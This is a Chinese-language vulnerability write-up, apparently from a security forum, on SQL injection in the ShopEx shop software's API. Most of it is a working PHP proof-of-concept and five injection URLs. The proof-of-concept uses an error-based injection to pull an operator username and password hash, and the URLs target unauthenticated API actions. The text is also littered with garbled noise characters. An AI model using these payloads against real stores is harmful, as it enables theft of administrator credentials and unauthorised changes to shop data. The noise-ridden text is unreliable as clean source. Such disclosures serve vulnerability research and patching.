|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
. l( d# [6 ^3 F, H4 O# ocore\api\payment\1.0\api_b2b_2_0_payment_cfg.php' X! r& m; d/ k7 c) ]
, N& ~; n* K7 w1 n n k) @+ F第44行 $data['columns'] 未做过滤导致注入
% T" `- Q2 ^, _" k- X9 @
, y, m5 a: k$ ]( a3 G( i<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
# z; A8 S6 m+ E( P6 ~0 p
! E! ?+ F8 ?5 I注射1:
& b0 [ }) V/ B7 P" ^6 N1 L, _* o! I4 u
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
$ O! c; w. @! z) E K& @" E
' Z* C$ S n4 S* L注射2:) U5 P+ u5 q9 c: @2 M7 y* x
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
M0 X+ D& J' Z3 M4 W& m7 d9 A% B$ A0 d, L; a. G: Y
注射3:4 y# W2 H9 C9 F/ J) e
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx# y& `" t2 V2 M; L) F
注射4:' `- ?+ v7 C5 P4 c7 g2 G4 P
2 P. c4 x8 l7 _
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
9 M% N4 y9 S* C% L7 E
. f1 g/ U4 Q+ P0 d5 K
( B, n* X! j* i4 W, I注射5:$ f p1 M4 w! Z/ B
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
0 j" K {% n: p4 q1 O( V w C+ _
! J6 P4 Y G) r5 w2 u- c
" Y8 A- d" M Z9 P+ n7 L; Q% E" Q/ F2 V. F/ Q( `# ]1 h: B- ^. @1 d. m
3 Z7 e, G+ |. v- ]" ]" W, K6 a; m$ m7 g7 q& p
|
|